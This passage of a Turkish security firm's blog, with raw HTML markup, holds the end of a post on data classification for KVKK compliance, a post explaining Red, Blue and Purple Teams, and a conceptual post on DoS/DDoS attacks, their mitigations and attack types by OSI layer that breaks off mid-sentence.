uyum sağlama konusunda örnek vermek gerekirse kişisel verileri işleyen kurumların
bu verileri tutmak için yasal olarak bazı süreler belirlenmiştir ve bu
sürelerin sonunda verilerin silinmesi gerekmektedir; bunu sağlamak adına
verilerin tutulduğu dosyalar etiketlendiğinde yasal saklama süresi tanımlanırsa
bu süre bittiğinde veriler silinmiş olur. Bu sürecin takibini yapmak
kullanıcılar için oldukça vakit alan bir işlem olabilir fakat veriler
sınıflandırılıp etiketlendiği takdirde bu hususun takibi kullanıcıların dakikalarını
alır. KVKK’ya uyum konusunda bir diğer husus ise veri sorumlusuna başvuru
sürecidir. İlgili kişi, veri sorumlusuna yaptığı başvuruda kişisel verisinin
işlenip işlenmediğini, kişisel verileri işlenmişse hangi amaç doğrultusunda
işlendiği, yurt içinde veya yurt dışında olmak üzere kişisel verilerinin hangi
üçüncü kişilere aktarıldığı konusunda bilgileri almayı talep edebilir. Veri
sorumlusunun bu hususta yasal bir sonuçlandırma süresi vardır. Bu bilgilere
ulaşmak, verilerini sınıflandırmadan saklayan, kullanan ve işleyen bir kuruluş
için çalışanların günlerce efor sarf etmesine sebep olabilir çünkü verilerin
kaynağı olarak çok fazla dosya ve uygulamanın kontrol edilmesi gerekebilir. Veri
sınıflandırma için uygulamaların ve araçlarının kullanılması zaman ve maliyet
açısından tasarruf sağlayacağı gibi, yasal düzenlemelere ve çerçevelere uyum
sağlama konusunda kuruluşun başvurması gereken temel kaynaklardan
olmalıdır.</div>
<div class="MsoNormal" style="text-align: justify;">
<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<b>Faydalanılan Kaynaklar<o:p></o:p></b></div>
<br />
<br />
· https://www.isaca.org/resources/news-and-trends/newsletters/cobit-focus/2015/using-cobit-5-to-deliver-information-and-data-governance<br />
· 6698 Sayılı Kişisel Verilerin Korunması Kanunu<br />
· ISO/IEC 27001 Bilgi Güvenliği Yönetim Sistemi Standardı<br />
· https://www.park.com.tr/wp-content/uploads/2016/02/TITUS-Siniflandirma-cozumu1.pdf<br />
· https://innoset.net/boldonjames<br />
· https://docs.microsoft.com/tr-tr/cloud-app-security/dcs-inspection<br />
· https://www.platinbilisim.com.tr/TR/IsOrtaklari/symantec-information-centric-tagging-ict<br />
· https://www.cozumpark.com/office-365-security-compliance-center-veri-siniflandirma-data-classification-labels-bolum-1/Sinem Varolhttp://www.blogger.com/profile/16134353775231308294noreply@blogger.com0tag:blogger.com,1999:blog-2815426134653926766.post-61376311926670902532020-04-02T15:21:00.004+03:002020-04-11T17:52:30.652+03:00Red Team Ve Blue Team Nedir? <div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;"> </span><br />
<h2 style="text-align: center;">
<b style="text-align: justify;"><span style="font-size: x-small;"> Tuğcan Özel, Sızma Testi Uzmanı</span></b></h2>
<div>
<b style="text-align: justify;"><span style="font-size: x-small;"><br /></span></b></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-Tdj2INkO-Q0/XoXVVRc2fnI/AAAAAAAAAB4/VGLcmRst8-M6ue7C4vPY1mkpB2gZg-d4wCK4BGAYYCw/s1600/red-blue-purple.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://3.bp.blogspot.com/-Tdj2INkO-Q0/XoXVVRc2fnI/AAAAAAAAAB4/VGLcmRst8-M6ue7C4vPY1mkpB2gZg-d4wCK4BGAYYCw/s400/red-blue-purple.jpg" /></a></div>
<div class="MsoNormal">
<span lang="TR" style="font-family: "calibri" , "sans-serif"; font-size: 11.0pt; line-height: 107%;"><br /></span></div>
<div class="MsoNormal">
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR"><span style="font-family: inherit;">Herhangi bir
arabanın güvenli olduğundan nasıl emin olmaktayız? Kaza testi yaptırarak. Özellikle
teknoloji konusunda bir şeyi güçlendirmek için izlenecek en iyi yol, bu konuyla
alakalı testler gerçekleştirmektir. Doğal olarak aynı prensipler siber güvenlik
bileşenlerinde de geçerlidir. Güvenlik altyapılarınızdaki zafiyetleri ve
zayıflıkları efektif bir şekilde ortaya çıkarmanın ve gidermenin yolu Red/Blue Team
testleri gerçekleştirmektir. İki takım arasındaki farklılıklardan ortaya çıkan
Purple Team anlayışı ile de organizasyonda iyileştirmeler yapılmaktadır.</span><o:p></o:p></span></div>
</div>
<div class="MsoNormal">
<span lang="TR" style="font-family: "calibri" , "sans-serif"; font-size: 11.0pt; line-height: 107%;"><br /></span></div>
<div class="MsoNormal">
<span lang="TR"><span style="font-family: inherit;">Red
Team, Blue Team ve Purple Team isimleri ve modelleri hali hazırda uygulanan ordu
stratejileri baz alınarak ortaya çıkmıştır. Ordular, askerlerin savaşa hazır olduklarına
emin olmak için, belli başlı stratejiler uygulamaktalardır. Bu süreçte
uygulanan stratejilere uygun aksiyonlar alınmaktadır. Saldırı için alınan
aksiyonlar ile ilgili takım kırmızı (red), savunma için alınan aksiyonlar ile
ilgili takım mavi (blue) ve bu alınan aksiyonların yönetilmesi için oluşturulan
takım ise mor (purple) takım olarak belirlenmiştir. Aynı orduda olduğu gibi siber
güvenlik arenasında bu roller dijital ortama taşınmıştır.</span></span></div>
<div class="MsoNormal">
<span lang="TR" style="font-family: "calibri" , "sans-serif"; font-size: 11.0pt; line-height: 107%;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><b>Red Team Nedir?</b></span><br />
<span style="font-family: inherit;"><b><br /></b></span>
<span lang="TR"><span style="font-family: inherit;">Red Team, kavramı
saldırgan gibi düşünmek üzerine ortaya çıkmıştır. Red Team testleri, organizasyonların
siber güvenlik konusunda savunma hatlarını güçlendirmek için gerçekleştirilir.
Test yaklaşımları zafiyet değerlendirmesi, sızma testi ve sosyal mühendislik testleri
gibi konuları içermektedir. Red Team testlerinde, tasarlanan simülasyonları en
iyi şekilde gerçekleştirmek için sızma testlerinde yaygın olarak kullanılan araçlar
kullanılmaktadır.</span></span><br />
<span lang="TR"><span style="font-family: inherit;"><br /></span></span>
<br />
<div class="MsoNormal">
<span lang="TR"><span style="font-family: inherit;">Red
Team operasyonları gerçekleştiriliyorken, IT takımları ve mavi takımları da
dahil olmak üzere bir çok çalışanının, genellikle operasyon bitene kadar bu
operasyonun gerçekleştirileceğine dair bilgileri bulunamamaktadır. Bu durum
hizmeti alan kuruluşun tercihine göre değişiklik gösterebilir.</span><br />
<span lang="TR" style="font-family: inherit; font-weight: normal; line-height: 107%;"><br /></span></span></div>
<div class="MsoNormal">
<span lang="TR"><span style="font-family: inherit;">Bazı
kurumlar, bu operasyonları iç kaynaklara yürütebilmek için Red Team takımları
oluşturmaktadır. Red Team hizmeti çoğunlukla, bağımsız bir gözlemci tarafından
yapılmasının daha sağlıklı olması nedeniyle Güvenlik Danışmanlığı sağlayan şirketler
tarafından gerçekleştirilmektedir. Bu
sayede kuruma ait çalışanların gözünden kaçabilecek zayıflıklar ve açıklıklar tespit edilebilmektedir. </span></span><br />
<span lang="TR" style="font-family: "calibri" , sans-serif; font-weight: normal; line-height: 107%;"><br /></span></div>
<div class="MsoNormal">
<b>Blue Team Nedir?</b><br />
<b><br /></b></div>
<div class="MsoNormal">
<span lang="TR"><span style="font-family: inherit;">Blue
Team çalışanları, kurumlara dış dünyadan gelebilecek bir saldırıya karşı önlem
almak ve saldırıya sebep olan zayıflıkları iyileştirmek ile görevlilerdir. Bu ekibin diğer görevi ise saldırı anında
gelen vektörleri engellemek ya da azaltmaktır. Olası bir saldırı öncesi
hazırlıklı olmak adına, düzenli olarak sistemleri ve prosedürleri güçlendirmek/güncellemek,
kurumda kullanılan yazılımlar konusunda ise yazılımlarda yer alan gereksiz ve
güvensiz özellikleri tespit edip kullanımını sonlandırmak ile görevlilerdir. Gelebilecek olası bir saldırıya her an
hazırlıklı olabilmek için SIEM çözümleri ile sistemleri dinamik olarak
izleyerek hızlıca müdahaleye hazır durumda bulunurlar.</span></span><br />
<span lang="TR" style="font-family: "calibri" , sans-serif; font-weight: normal; line-height: 107%;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif;"><b>Purple Team Nedir?</b></span><br />
<span style="font-family: "calibri" , sans-serif;"><b><br /></b></span></div>
<div class="MsoNormal">
<span lang="TR"><span style="font-family: inherit;">Purple
Team terimi, Red Team ve Blue Team operasyonlarında alınan aksiyonların ortak
bir noktada buluşturulup yönetilmesi konusuyla ortaya çıkmıştır. Purple Team
kavramı, güvenliğin teknik operasyonlardan nispeten uzak, sürecin yönetimiyle
ilgili operasyon kaynağını temsil etmektedir. Purple Team çalışanları, meydana
gelen olayları Red Team ve Blue Team disipliniyle beraber yorumlamaktadır. Bu sayede, güvenliği seviyesi
en yüksek seviyeye ulaştırılmaya çalışılmaktadır. Genel olarak ifade etmek
gerekirse, Red Team bu süreçte zafiyetleri inceleyip bulurken Blue Team’i geliştirmekte, Blue Team gerekli savunma
aksiyonlarını alırken Red Team’i geliştirmektedir. Bu iki takımın saldırı ve
savunma noktasında yönetimsel olarak geliştirilmesi ise Purple Team tarafından
gerçekleştirilmektedir.</span></span><br />
<h4>
<span lang="TR" style="font-family: "calibri" , sans-serif; font-weight: normal; line-height: 107%;"><br /></span></h4>
</div>
<div class="MsoNormal">
<span lang="TR" style="font-family: "calibri" , sans-serif; line-height: 107%;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-4ktBb35yuR4/XoXXdOy3swI/AAAAAAAAACQ/4gQDL1hwygsiCythPZ69DBcx-2y2hXTpQCK4BGAYYCw/s1600/blue-red-purple-s%25C3%25BCre%25C3%25A7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="134" src="https://3.bp.blogspot.com/-4ktBb35yuR4/XoXXdOy3swI/AAAAAAAAACQ/4gQDL1hwygsiCythPZ69DBcx-2y2hXTpQCK4BGAYYCw/s320/blue-red-purple-s%25C3%25BCre%25C3%25A7.png" width="320" /></a></div>
<div class="MsoNormal">
<span lang="TR" style="font-family: "calibri" , sans-serif; line-height: 107%;"><br /></span></div>
<div class="MsoNormal">
<span lang="TR" style="font-family: "calibri" , sans-serif; line-height: 107%;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif;"><b>Özet</b></span></div>
<ol>
<li><div class="MsoListParagraph">
<h4>
<span lang="TR" style="font-weight: normal;"><span style="font-family: inherit;">Red
Team, organizasyonun içinde bulunan savunma noktalarında zafiyet bulmak için
saldırganlar gibi davranarak bir simülasyon düzenler</span>.</span></h4>
</div>
</li>
<li><div class="MsoListParagraph">
<h4>
<span lang="TR"><span style="font-family: inherit; font-weight: normal;">Blue
Team, organizasyonunun güvenlik konusunda güçlü noktada olması ve saldırganlara
karşı savunulması noktasında devamlı olarak güvenlik geliştirmeleri yapar.</span></span></h4>
</div>
</li>
<li><div class="MsoListParagraph">
<h4>
<span lang="TR"><span style="font-family: inherit; font-weight: normal;">Red/Blue
Team aksiyonlarında, devamlı gelişim sağlamak amacıyla iki takım arasında
bilgiler paylaşılmaktadır. Böylece kurumlar siber güvenlik konusunda daha iyi
noktalara ulaşırlar.</span></span></h4>
</div>
</li>
<li><div class="MsoListParagraph">
<h4>
<span lang="TR" style="font-weight: normal;"><span style="font-family: inherit;">Purple
Team kavramı, iki takımın birbiri arasındaki devamlı entegrasyonu sağlamak,
iletişimi kolaylaştırmak ve süreci yönetmek amacıyla meydan gelmiştir</span>.</span></h4>
</div>
</li>
<li><h4>
<span style="font-family: inherit; font-weight: normal;">Purple
Team kavramı,gereksiz veya geçici çözüm
olarak ortaya çıkmış bir kavram değildir. Şuan çok yaygın olmasa da gelecekte kurumlar
içinde daha gerekli ve kavramsallaşmış bir yapı olacaklardır.</span></h4>
</li>
</ol>
</div>
BTYÖN red team hizmetinin detaylarını öğrenmek ve teklif istemek için <a href="https://btyon.com.tr/red-team.php" target="_blank">tıklayınız</a>.<br />
<span style="font-family: "calibri" , sans-serif;"><b></b></span>
Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-2815426134653926766.post-39822554365411558342020-03-30T17:22:00.000+03:002020-04-03T13:29:07.627+03:00DoS/ DDoS Nedir? OSI Katmanlarına Göre DoS/DDoS Saldırıları<br />
<h2 style="line-height: normal; text-align: center;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-large;">DoS
ve DDoS Nedir?</span></b></h2>
<div style="text-align: right;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<div style="text-align: right;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Kübra Eskalan, Sızma Testi Uzmanı</span></b></div>
<div class="MsoNormal" style="line-height: normal; text-align: right;">
<br /></div>
<div class="MsoNormal" style="line-height: normal; text-align: justify;">
<div class="MsoNormal" style="line-height: normal;">
<div class="MsoNormal" style="line-height: normal;">
<div class="MsoNormal" style="line-height: normal;">
<div class="MsoNormal" style="line-height: normal;">
<span style="background: white; font-size: 12pt; letter-spacing: 0.3pt;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Denial
of Service yani DoS atağı kötü niyetli kişiler tarafından yapılarak sistemin normal
işleyişini kesintiye uğratarak kullanılamaz hale getirmesini amaçlamaktadır.
DoS atağını başlatmak için tek bir cihaz yeterlidir. Bu atak türünde hedef
bilgisayara eş zamanlı ve mümkün olduğunca çok sayıda istek gönderilir. Sistemlerin
ağ trafiğinin bir kapasitesi vardır. Sistemin sahip olduğu bu kaynaklara
saldırganlar tarafından aşırı yüklenildiğinde dolan kapasitenin karşısında, firewall
gelen paketlerin hangisinin gerçek veya saldırı olduğunu anlamakta yetersiz kalmaktadır.
Bu yüzden sistem hizmetleri yavaşlamakta hatta verilen hizmetler bu saldırılar sonrasında
tamamen çökebilmektedir. Fark edilmesi ve engellenmesi DDoS ataklara göre
kolaydır. Nedeni ise tek sunucu üzerinden yapıldığı için bu sunucu adresinden
gelen paketleri engelleyerek atağın önlenmesi mümkündür. DoS atakları genel olarak
önemli bilgi yahut varlıkların ele geçirilmesi ile sonuçlanmasa bile mağdur
için büyük miktarlarda para ve zamana mal olabilmektedir.<o:p></o:p></span></span><br />
<span style="background: white; font-size: 12pt; letter-spacing: 0.3pt;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="background: white; font-size: 12pt; letter-spacing: 0.3pt;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Distributed
Denial of Service yani DDoS atakları, en etkin saldırı yöntemleri arasında
bulunmaktadır. Bu saldırı bir saldırı kaynağından değil de birçok farklı kaynaktan
gelen bir DoS saldırısı türüdür. Yani birden fazla sistem senkronize edilerek
bir DoS saldırısını tek bir hedefe düzenlediğinde gerçekleşmektedir. Temel fark bir yerden saldırıya uğranması
yerine aynı anda birçok yerden saldırıya uğranmasıdır. DDoS saldırıları, Ping,
HTTP, Slowloris, SYN vb. saldırı türleriyle yapılabilir üstelik çok uzun
süreler devam edebilir. Sunucuların açık bulunun portları sebebiyle kötücül
kişiler, hassas verilere erişebilir, bu verileri kullanabilir ya da satabilir. Başarılı
bir DDoS saldırısı, tüm çevrimiçi kullanıcı tabanını etkileyen oldukça dikkat
çekici bir olaydır.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="background: white; font-size: 12pt; letter-spacing: 0.3pt;"><span style="font-family: "arial" , "helvetica" , sans-serif;">DoS ve
DDoS saldırılarıyla hedeflenen sisteme sızmaktan çok sistemin verdiği
hizmetleri aksatmaktır. Saldırı hedefi olan taraf hizmet veremediği süre
boyunca maddi ve itibar olarak zarara uğramaktadır. Durum böyle olunca bu
saldırılar bazı ülkelerin de kullanmaktan kaçınmadığı bir silah haline gelmiştir.
Çünkü ülkelerin elindeki bu silah çok daha maliyetsiz ve çok daha etkili
olabilecek seviyede olduğu görülmüştür. Günümüzde çok rahat bir şekilde
yapılabilir hale gelmesi ile basit vasıtalarla bu saldırılar
gerçekleştirilmektedir. Bu saldırıların kurbanları genel olarak ticaret şirketleri,
devlet kuruluşları ve bankacılık gibi yüksel profilli kuruluşların sunucularıdır.
Toparlayacak olursak saldırganlar saldırıyı tek bir ana bilgisayardan yaparsa
buna bir DoS saldırısı denir. Lakin saldırgan çoklu makineler ile kurbana DoS
saldırısı düzenlerse bu saldırılar DDoS saldırısı olarak sınıflandırılır.<o:p></o:p></span></span><br />
<span style="background: white; font-size: 12pt; letter-spacing: 0.3pt;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="background: white; font-size: 12pt; letter-spacing: 0.3pt;"><span style="font-family: "arial" , "helvetica" , sans-serif;">DoS ve DDoS saldırılarının
çok yaygın olmasından dolayı birçok insan bu saldırılara dair birtakım
fikirlere sahiptir. Bu fikir çokluğundan dolayı oluşan yanlış bilgiler ise
azımsanamayacak kadar fazladır. Linux sistemlerinin bu saldırılara karşı çok
daha dayanıklı olduğu bilgisi kesinlikle gerçeği yansıtmamaktadır. Kısaca hiçbir
Firewall ve IPS’in tek başına DDoS’u engelleyemeyeceğini belirtmekte fayda
vardır.<o:p></o:p></span></span></div>
<span style="font-size: 12pt; letter-spacing: 0.3pt; line-height: 107%;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br />
<span style="background: white;">Son olarak belirtmek isterim ki, kanuni açıdan
bu saldırılar her ne kadar sayıca fazla olsa da firmaların hizmetlerini engellemeye
neden olduğu için suç sayılmıştır.</span></span></span></div>
</div>
</div>
</div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div>
<div class="MsoNormal" style="line-height: normal; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><i><span style="background: white; color: black; font-size: 18pt; letter-spacing: 0.3pt;">Peki Bu Saldırıları Engellemek
Mümkün Mü?</span></i></b><span style="color: black; font-size: 12pt; letter-spacing: 0.3pt;"><br />
</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><i><span style="background: white; color: black; font-size: 18pt; letter-spacing: 0.3pt;"><br /></span></i></b></span>
<br />
<div class="MsoNormal" style="line-height: normal;">
<span style="background: white; font-size: 12pt; letter-spacing: 0.3pt; line-height: 107%;"><span style="font-family: "arial" , "helvetica" , sans-serif;">DoS/DDoS saldırılarının yüzde yüz engellenmesi gibi
bir durum söz konusu olmasa bile bu saldırıları hafifletmek adına kurumlar bir
dizi önlem alabilirler. Olası bir duruma
karşı hazırlıklı olmak için aşağıdaki önlemleri sayabiliriz;</span></span><br />
<span style="background: white; font-size: 12pt; letter-spacing: 0.3pt;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<br />
<div class="MsoListParagraphCxSpFirst" style="line-height: normal; text-indent: -18pt;">
</div>
<ul>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 12pt; letter-spacing: 0.3pt; text-indent: -18pt;"><span style="font-size: 7pt; font-stretch: normal; line-height: normal;"> </span></span><span style="background: white; font-size: 12pt; letter-spacing: 0.3pt; text-indent: -18pt;">Düzenli olarak sızma testi yaptırılarak, sistemlerin hangi
noktada durduğu tespit edilmeli buna göre gerekli önlemler alınmalıdır.</span></span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 12pt; letter-spacing: 0.3pt;"><span style="font-size: 7pt; font-stretch: normal; line-height: normal;"> </span></span><span style="font-size: 12pt; letter-spacing: 0.3pt;">Bütün sistemler
vaktinde güncellenmelidir</span></span>.</li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="letter-spacing: 0.3pt;"><span style="font-size: 7pt; font-stretch: normal; line-height: normal;"> </span></span><!--[endif]--><span style="font-size: 12pt; letter-spacing: 0.3pt;">Güvenilirliği
yüksek anti virüs yazılımları ve donanımı kullanılmalıdır.<span style="background: white;"><o:p></o:p></span></span></span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 12pt; letter-spacing: 0.3pt;">Gelebilecek
saldırılar önceden düşünülüp bant genişliği kurumun ihtiyacından fazlası
olmalıdır.<span style="background: white;"><o:p></o:p></span></span></span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="letter-spacing: 0.3pt;"><span style="font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;"><span style="font-family: "symbol";"> </span></span></span><span style="font-size: 12pt; letter-spacing: 0.3pt;">Verilerin
birden çok sunucuda saklanılması ve kullanılması.<span style="background: white;"><o:p></o:p></span></span></span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="letter-spacing: 0.3pt;"><span style="font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;"><span style="font-family: "symbol";"> </span></span></span><span style="font-size: 12pt; letter-spacing: 0.3pt;">Olağan dışı
durumlar için ağ cihazları yapılandırılmalı ve ağ trafiği izlenmelidir.<span style="background: white;"><o:p></o:p></span></span></span></li>
</ul>
<!--[if !supportLists]--><br />
<span style="background: white; font-size: 12pt; letter-spacing: 0.3pt;"><span style="font-family: "arial" , "helvetica" , sans-serif;">
</span></span></div>
</div>
<h2 style="line-height: normal; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-large;"><b><span style="background: white; color: black; letter-spacing: 0.3pt;">OSI
Nedir? Katmanlarına Göre DoS/DDoS Saldırıları </span></b></span></h2>
<div class="MsoNormal" style="line-height: normal; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="line-height: normal; text-align: justify;">
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background: white; font-size: 12pt;">OSI (Open System Interconnect) nedir sorusuna basitçe
farklı kişilerin geliştirdiği network bileşenlerinin uyumlu olarak çalışmasını
sağlayan kurallar bütünüdür diyebiliriz. Yani OSI, ağ sistemleri için bir
kılavuz niteliği taşır. Network ürünleri geliştirmekte olan bütün firmalar OSI
kurallarına uygun bir şekilde cihaz geliştirmek zorundadır. OSI kurallarına
uygun geliştirilmemiş cihazlar, farklı cihazlarla oluşturulmuş networkler ile konuşamazlar.</span><span style="background: white; font-size: 12pt;"><o:p></o:p></span></span></div>
<br />
<div class="MsoNormal" style="line-height: normal;">
<span style="background: white; font-size: 12pt;"><span style="font-family: "arial" , "helvetica" , sans-serif;">OSI bilindiği üzere yedi katmana ayrılmıştır ve
iletişim sırasında kullanılan protokoller ve donanımlar bu katmanlarda bulunur.
OSI modelinde katmanlar birbirlerinden bağımsız değildir ve her katman
kendinden önce olan katmana hizmet eder. İki cihaz arasında veri iletimi
gerçekleştirileceğinde, veriyi gönderen için iletim uygulama katmanından
başlayarak fiziksel katmana doğru devam eder. Bu işleme encapsulation denir.
Veri alan cihaz için durum tam tersidir. Yani verinin iletimi fiziksel
katmandan başlayarak uygulama katmanına doğru olur.</span></span><span style="background: white; font-family: "comic sans ms"; font-size: 12.0pt;"><o:p></o:p></span></div>
</div>
<div class="MsoNormal" style="line-height: normal; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="line-height: normal; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="line-height: normal; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background: white; color: black; font-size: 12pt;"></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-tV-gEun9i3s/XoMSVA8QijI/AAAAAAAAAAk/bEJDgPxRYr4ehzusy2nq6Es8m3Cmfk6xACNcBGAsYHQ/s1600/OSI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="599" data-original-width="710" height="335" src="https://1.bp.blogspot.com/-tV-gEun9i3s/XoMSVA8QijI/AAAAAAAAAAk/bEJDgPxRYr4ehzusy2nq6Es8m3Cmfk6xACNcBGAsYHQ/s400/OSI.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif; margin-left: 1em; margin-right: 1em;"></span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNormal" style="line-height: normal; text-align: justify;">
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background: white; font-size: 12pt;">Her katman için farklı DoS saldırı çeşitleri
vardır.</span><span style="background: white; font-size: 12pt;"><o:p></o:p></span></span></div>
<div class="MsoNormal" style="line-height: normal;">
<br /></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><i><span style="background: white; font-size: 12pt;">7. Katman için DoS ve DDoS </span></i></b><b><i><span style="background: white; font-size: 12pt;"><o:p></o:p></span></i></b></span></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background: white; font-size: 12pt;">Misal verecek olursak, herhangi bir web sitesine
girebilmek için tarayıcıyı açan son kullanıcı bu işlemi http protokolünden
dolayı 7. katmanda gerçekleştirir. Son kullanıcı tarafından çalıştırılabilecek
tüm uygulamalar bu seviyede yer almaktadır. Bu katmanda Telnet, FTP, DHCP, DNS,
HTTP, SMTP, POP protokolleri kullanılır. Elektronik posta, veri tabanı
yönetimleri, dosya paylaşımları gibi işlemler gerçekleştirilir. Olabilecek
sonuçları arasında kaynakların kullanım sınırlarına erişmesinden dolayı sistemi
çalışması için gerekli kaynaklarda kıtlığın yaşanması gösterilebilir. </span><span style="background: white; font-size: 12pt;"><o:p></o:p></span></span></div>
<div class="MsoNormal" style="line-height: normal;">
<br /></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><i><span style="background: white; font-size: 12pt;">6. Katman için DoS DDoS</span></i></b><b><i><span style="background: white; font-size: 12pt;"><o:p></o:p></span></i></b></span></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background: white; font-size: 12pt;">Bu katmanda sıkıştırma ve şifreleme protokolleri
kullanılır. Veri sıkıştırma, şifreleme ve çözme işlemleri, veri formatının
değiştirilmesi gibi işlemler bu katmanda gerçekleştirilmektedir. Bu katmanda
yapılacak saldırılara örnek olarak, kötü niyetle biçimlendirilmiş SSL istekleri
gösterilebilir. Bu saldırıda kötü niyetli saldırgan sunucuyu hedef almak için
http ataklarını SSL ile tüneller.</span><span style="background: white; font-size: 12pt;"><o:p></o:p></span></span></div>
<div class="MsoNormal" style="line-height: normal;">
<br /></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><i><span style="background: white; font-size: 12pt;">5. Katman için DoS ve DDoS</span></i></b><b><i><span style="background: white; font-size: 12pt;"><o:p></o:p></span></i></b></span></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background: white; font-size: 12pt;">Session katmanında oturum açma ve kapatma
protokolleri kullanılır. Ağdaki işletim sistemleri içerisinde oturumun
kurulması, sonlandırılması ve senkronizasyonunun sağlanması bu katmanda
gerçekleşir. Bir saldırı örneği olarak Telnet servisinin durdurulması gösterilebilir.</span><span style="background: white; font-size: 12pt;"><o:p></o:p></span></span></div>
<div class="MsoNormal" style="line-height: normal;">
<br /></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><i><span style="background: white; font-size: 12pt;">4. Katman için DoS ve DDoS</span></i></b><b><i><span style="background: white; font-size: 12pt;"><o:p></o:p></span></i></b></span></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background: white; font-size: 12pt;">Transport katmanı, üstündeki ve altındaki
katmanları arasındaki bağlantıyı sağlar. SPX, SCTP, TCP, DCCP gibi verinin
iletimi üzerinde rol alan protokolleri kullanır. Verinin alıcısına ulaşıp
ulaşmadığını kontrol eder. Bu katmanda gerçekleştirilen saldırılar için SYN
Flood ve Smurf saldırısı örnek gösterilebilir.</span><span style="background: white; font-size: 12pt;"><o:p></o:p></span></span></div>
<div class="MsoNormal" style="line-height: normal;">
<br /></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><i><span style="background: white; font-size: 12pt;">3. Katman için DoS ve DDoS</span></i></b><b><i><span style="background: white; font-size: 12pt;"><o:p></o:p></span></i></b></span></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background: white; font-size: 12pt;">Transport katmanından gelen istekleri
cevaplandırarak bunları data link katmanına iletir. IPX, ARP, IP, ICMP gibi protokoller
kullanılır. Network katmanında ağdaki
cihazların adresleme işlemleri gerçekleştirilir ayrıca gelen veri paketlerinin
ağ adresleri kullanılarak uygun ağlara yönlendirilmesi sağlanır. Router bu
katmanda yer alır. ICMP Flood saldırısı bu katmanda yapılan saldırılara örnek
gösterilebilir. </span><span style="background: white; font-size: 12pt;"><o:p></o:p></span></span></div>
<div class="MsoNormal" style="line-height: normal;">
<br /></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><i><span style="background: white; font-size: 12pt;">2. Katman için DoS ve DDoS</span></i></b><b><i><span style="background: white; font-size: 12pt;"><o:p></o:p></span></i></b></span></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background: white; font-size: 12pt;">Data Link katmanında 802.3 & 802.5
protokolleri kullanılır. Bu katmanda fiziksel katmana erişim ile ilgili
kurallar düzenlenir. Bunlar fiziksel katman üzerinden transferin kurulması,
